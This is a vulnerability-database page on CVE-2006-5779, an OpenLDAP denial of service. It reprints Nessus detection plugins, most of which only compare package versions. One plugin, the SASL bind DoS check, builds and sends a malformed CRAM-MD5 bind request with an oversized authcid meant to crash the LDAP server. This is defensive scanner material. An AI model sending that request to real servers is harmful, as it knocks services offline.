Vulnerabilities > CVE-2006-5779 - Reachable Assertion vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
HIGH Summary
OpenLDAP before 2.3.29 allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 2 | |
| OS | 3 |
Common Weakness Enumeration (CWE)
Nessus
NASL family SuSE Local Security Checks NASL id SUSE_SA_2006_072.NASL description The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client). OpenLDAP libldap last seen 2019-10-28 modified 2007-02-18 plugin id 24449 published 2007-02-18 reporter This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/24449 title SUSE-SA:2006:072: openldap2-client code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:072 # if ( ! defined_func("bn_random") ) exit(0); include("compat.inc"); if(description) { script_id(24449); script_version ("1.9"); name["english"] = "SUSE-SA:2006:072: openldap2-client"; script_name(english:name["english"]); script_set_attribute(attribute:"synopsis", value: "The remote host is missing a vendor-supplied security patch" ); script_set_attribute(attribute:"description", value: "The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client). OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. This is tracked by the Mitre CVE ID CVE-2006-5779." ); script_set_attribute(attribute:"solution", value: "http://www.novell.com/linux/security/advisories/2006_72_openldap2.html" ); script_set_attribute(attribute:"risk_factor", value:"High" ); script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/18"); script_end_attributes(); summary["english"] = "Check for the version of the openldap2-client package"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc."); family["english"] = "SuSE Local Security Checks"; script_family(english:family["english"]); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/SuSE/rpm-list"); exit(0); } include("rpm.inc"); if ( rpm_check( reference:"openldap2-client-2.2.27-6.4", release:"SUSE10.0") ) { security_hole(0); exit(0); } if ( rpm_check( reference:"openldap2-client-2.2.23-6.6", release:"SUSE9.3") ) { security_hole(0); exit(0); }NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-384-1.NASL description Evgeny Legerov discovered that the OpenLDAP libraries did not correctly truncate authcid names. This situation would trigger an assert and abort the program using the libraries. A remote attacker could send specially crafted bind requests that would lead to an LDAP server denial of service. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 27967 published 2007-11-10 reporter Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/27967 title Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Ubuntu Security Notice USN-384-1. The text # itself is copyright (C) Canonical, Inc. See # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered # trademark of Canonical, Inc. # include("compat.inc"); if (description) { script_id(27967); script_version("1.15"); script_cvs_date("Date: 2019/08/02 13:33:01"); script_cve_id("CVE-2006-5779"); script_bugtraq_id(20939); script_xref(name:"USN", value:"384-1"); script_name(english:"Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)"); script_summary(english:"Checks dpkg output for updated packages."); script_set_attribute( attribute:"synopsis", value: "The remote Ubuntu host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "Evgeny Legerov discovered that the OpenLDAP libraries did not correctly truncate authcid names. This situation would trigger an assert and abort the program using the libraries. A remote attacker could send specially crafted bind requests that would lead to an LDAP server denial of service. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://usn.ubuntu.com/384-1/" ); script_set_attribute( attribute:"solution", value:"Update the affected ldap-utils, libldap-2.2-7 and / or slapd packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:ldap-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libldap-2.2-7"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:slapd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:5.10"); script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.06:-:lts"); script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.10"); script_set_attribute(attribute:"patch_publication_date", value:"2006/11/20"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/10"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Ubuntu Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("ubuntu.inc"); include("misc_func.inc"); if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/Ubuntu/release"); if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu"); release = chomp(release); if (! ereg(pattern:"^(5\.10|6\.06|6\.10)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 5.10 / 6.06 / 6.10", "Ubuntu " + release); if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu); flag = 0; if (ubuntu_check(osver:"5.10", pkgname:"ldap-utils", pkgver:"2.2.26-3ubuntu0.2")) flag++; if (ubuntu_check(osver:"5.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-3ubuntu0.2")) flag++; if (ubuntu_check(osver:"5.10", pkgname:"slapd", pkgver:"2.2.26-3ubuntu0.2")) flag++; if (ubuntu_check(osver:"6.06", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu2.2")) flag++; if (ubuntu_check(osver:"6.06", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu2.2")) flag++; if (ubuntu_check(osver:"6.06", pkgname:"slapd", pkgver:"2.2.26-5ubuntu2.2")) flag++; if (ubuntu_check(osver:"6.10", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu3.1")) flag++; if (ubuntu_check(osver:"6.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu3.1")) flag++; if (ubuntu_check(osver:"6.10", pkgname:"slapd", pkgver:"2.2.26-5ubuntu3.1")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : ubuntu_report_get() ); exit(0); } else { tested = ubuntu_pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ldap-utils / libldap-2.2-7 / slapd"); }NASL family SuSE Local Security Checks NASL id SUSE_OPENLDAP2-CLIENT-2282.NASL description OpenLDAP libldap last seen 2020-06-01 modified 2020-06-02 plugin id 27364 published 2007-10-17 reporter This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/27364 title openSUSE 10 Security Update : openldap2-client (openldap2-client-2282) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openldap2-client-2282. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(27364); script_version ("1.12"); script_cvs_date("Date: 2019/10/25 13:36:28"); script_cve_id("CVE-2006-5779"); script_name(english:"openSUSE 10 Security Update : openldap2-client (openldap2-client-2282)"); script_summary(english:"Check for the openldap2-client-2282 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash (CVE-2006-5779)." ); script_set_attribute( attribute:"solution", value:"Update the affected openldap2-client packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client-32bit"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:10.1"); script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/17"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE10\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "10.1", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE10.1", reference:"openldap2-client-2.3.19-18.11") ) flag++; if ( rpm_check(release:"SUSE10.1", cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11") ) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openldap2-client / openldap2-client-32bit"); }NASL family SuSE Local Security Checks NASL id SUSE9_11307.NASL description OpenLDAP libldap last seen 2020-06-01 modified 2020-06-02 plugin id 41106 published 2009-09-24 reporter This script is Copyright (C) 2009-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/41106 title SuSE9 Security Update : openldap2-client (YOU Patch Number 11307) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The text description of this plugin is (C) Novell, Inc. # include("compat.inc"); if (description) { script_id(41106); script_version("1.6"); script_cvs_date("Date: 2019/10/25 13:36:28"); script_cve_id("CVE-2006-5779"); script_name(english:"SuSE9 Security Update : openldap2-client (YOU Patch Number 11307)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote SuSE 9 host is missing a security-related patch." ); script_set_attribute( attribute:"description", value: "OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. (CVE-2006-5779)" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2006-5779.html" ); script_set_attribute(attribute:"solution", value:"Apply YOU patch number 11307."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux"); script_set_attribute(attribute:"patch_publication_date", value:"2006/11/22"); script_set_attribute(attribute:"plugin_publication_date", value:"2009/09/24"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled."); if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE."); if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages."); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) exit(1, "Failed to determine the architecture type."); if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 9 on the '"+cpu+"' architecture have not been implemented."); flag = 0; if (rpm_check(release:"SUSE9", reference:"openldap2-client-2.2.24-4.22")) flag++; if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"openldap2-client-32bit-9-200611171828")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else exit(0, "The host is not affected.");NASL family Denial of Service NASL id OPENLDAP_SASL_BIND_DOS.NASL description The remote host appears to be running OpenLDAP, an open source LDAP directory implementation. The version of OpenLDAP installed on the remote host fails to handle malformed SASL bind requests. An unauthenticated attacker can leverage this issue to crash the LDAP server on the affected host. last seen 2020-06-01 modified 2020-06-02 plugin id 23625 published 2006-11-07 reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/23625 title OpenLDAP SASL authcid Name BIND Request DoS code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(23625); script_version("1.19"); script_cve_id("CVE-2006-5779"); script_bugtraq_id(20939); script_name(english:"OpenLDAP SASL authcid Name BIND Request DoS"); script_summary(english:"Tries to crash OpenLDAP"); script_set_attribute(attribute:"synopsis", value: "The remote LDAP server is prone to a denial of service attack." ); script_set_attribute(attribute:"description", value: "The remote host appears to be running OpenLDAP, an open source LDAP directory implementation. The version of OpenLDAP installed on the remote host fails to handle malformed SASL bind requests. An unauthenticated attacker can leverage this issue to crash the LDAP server on the affected host." ); script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/450728/30/0/threaded" ); # http://www.openldap.org/its/index.cgi/Archive.Software%20Bugs?id=4740;expression=authcid%20Name%20BIND%20Request;selectid=4740;usearchives=1 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9daf484d" ); script_set_attribute(attribute:"see_also", value:"http://www.openldap.org/software/release/changes.html" ); script_set_attribute(attribute:"solution", value: "Upgrade to OpenLDAP 2.3.29 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/07"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/06"); script_cvs_date("Date: 2018/11/15 20:50:21"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe",value:"cpe:/a:openldap:openldap"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"Denial of Service"); script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc."); script_dependencies("ldap_detect.nasl"); script_require_ports("Services/ldap", 389); exit(0); } include("global_settings.inc"); include("byte_func.inc"); include("misc_func.inc"); port = get_service(svc:"ldap", default: 389, exit_on_fail: 1); soc = open_sock_tcp(port); if (!soc) exit(0); id = rand() % 1024; set_byte_order(BYTE_ORDER_BIG_ENDIAN); req_bind1 = mkbyte(0x30) + # universal sequence mkbyte(0x17) + # length of the request mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random) mkbyte(0x60) + # bind request mkbyte(0x11) + # length of request mkbyte(2) + # version (3) mkbyte(1) + mkbyte(3) + mkbyte(4) + # authentication (SASL) mkbyte(0) + mkbyte(0xa3) + mkbyte(10) + mkbyte(4) + mkbyte(8) + "CRAM-MD5"; send(socket:soc, data:req_bind1); res = recv(socket:soc, length:1024); # If... if ( # the response is long enough and.. strlen(res) > 5 && # it looks like an LDAP message and... getbyte(blob:res, pos:0) == 0x30 && # it's a response to our request. (mkword(id) + mkbyte(0x61)) >< res ) { # Try to kill the server. id = id - 1; req_bind2 = mkbyte(0x30) + # universal sequence mkbyte(0x82) + mkword(0x041f) + # length of the request mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random) mkbyte(0x60) + # bind request mkbyte(0x82) + mkword(0x0417) + # length of request mkbyte(2) + # version (3) mkbyte(1) + mkbyte(3) + mkbyte(4) + # authentication (SASL) mkbyte(0) + mkbyte(0xa3) + mkbyte(0x82) + mkword(0x040e) + mkbyte(4) + mkbyte(8) + "CRAM-MD5" + mkbyte(4) + mkbyte(0x82) + mkword(0x0400) + crap(data:" ", length:1024); send(socket:soc, data:req_bind2); res = recv(socket:soc, length:1024); close(soc); # If we didn't get a response, try to open another connection. if (strlen(res) == 0) { sleep(1); if (service_is_dead(port: port) > 0) { security_warning(port); exit(0); } } }NASL family Mandriva Local Security Checks NASL id MANDRAKE_MDKSA-2006-208.NASL description An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 24593 published 2007-02-18 reporter This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/24593 title Mandrake Linux Security Advisory : openldap (MDKSA-2006:208) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Mandrake Linux Security Advisory MDKSA-2006:208. # The text itself is copyright (C) Mandriva S.A. # include("compat.inc"); if (description) { script_id(24593); script_version ("1.17"); script_cvs_date("Date: 2019/08/02 13:32:48"); script_cve_id("CVE-2006-5779"); script_bugtraq_id(20939); script_xref(name:"MDKSA", value:"2006:208"); script_name(english:"Mandrake Linux Security Advisory : openldap (MDKSA-2006:208)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value: "The remote Mandrake Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue." ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-static-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-static-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-servers"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007"); script_set_attribute(attribute:"patch_publication_date", value:"2006/11/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/18"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Mandriva Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux"); if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu); flag = 0; if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", reference:"openldap-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", reference:"openldap-clients-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", reference:"openldap-doc-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", reference:"openldap-servers-2.3.6-4.3.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"x86_64", reference:"lib64ldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", cpu:"i386", reference:"libldap2.3_0-static-devel-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"openldap-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"openldap-clients-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"openldap-doc-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2007.0", reference:"openldap-servers-2.3.27-1.1mdv2007.0", yank:"mdv")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-200611-25.NASL description The remote host is affected by the vulnerability described in GLSA-200611-25 (OpenLDAP: Denial of Service vulnerability) Evgeny Legerov has discovered that the truncation of an incoming authcid longer than 255 characters and ending with a space as the 255th character will lead to an improperly computed name length. This will trigger an assert in the libldap code. Impact : By sending a BIND request with a specially crafted authcid parameter to an OpenLDAP service, a remote attacker can cause the service to crash. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 23747 published 2006-11-30 reporter This script is Copyright (C) 2006-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/23747 title GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 200611-25. # # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(23747); script_version("1.13"); script_cvs_date("Date: 2019/08/02 13:32:43"); script_cve_id("CVE-2006-5779"); script_xref(name:"GLSA", value:"200611-25"); script_name(english:"GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-200611-25 (OpenLDAP: Denial of Service vulnerability) Evgeny Legerov has discovered that the truncation of an incoming authcid longer than 255 characters and ending with a space as the 255th character will lead to an improperly computed name length. This will trigger an assert in the libldap code. Impact : By sending a BIND request with a specially crafted authcid parameter to an OpenLDAP service, a remote attacker can cause the service to crash. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/200611-25" ); script_set_attribute( attribute:"solution", value: "All OpenLDAP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose 'net-nds/openldap'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openldap"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2006/11/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/30"); script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/06"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"net-nds/openldap", unaffected:make_list("ge 2.3.27-r3", "rge 2.2.28-r5", "rge 2.1.30-r8"), vulnerable:make_list("lt 2.3.27-r3"))) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get()); else security_warning(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenLDAP"); }NASL family SuSE Local Security Checks NASL id SUSE_OPENLDAP2-CLIENT-2291.NASL description OpenLDAP libldap last seen 2020-06-01 modified 2020-06-02 plugin id 29537 published 2007-12-13 reporter This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/29537 title SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The text description of this plugin is (C) Novell, Inc. # include("compat.inc"); if (description) { script_id(29537); script_version ("1.12"); script_cvs_date("Date: 2019/10/25 13:36:28"); script_cve_id("CVE-2006-5779"); script_name(english:"SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote SuSE 10 host is missing a 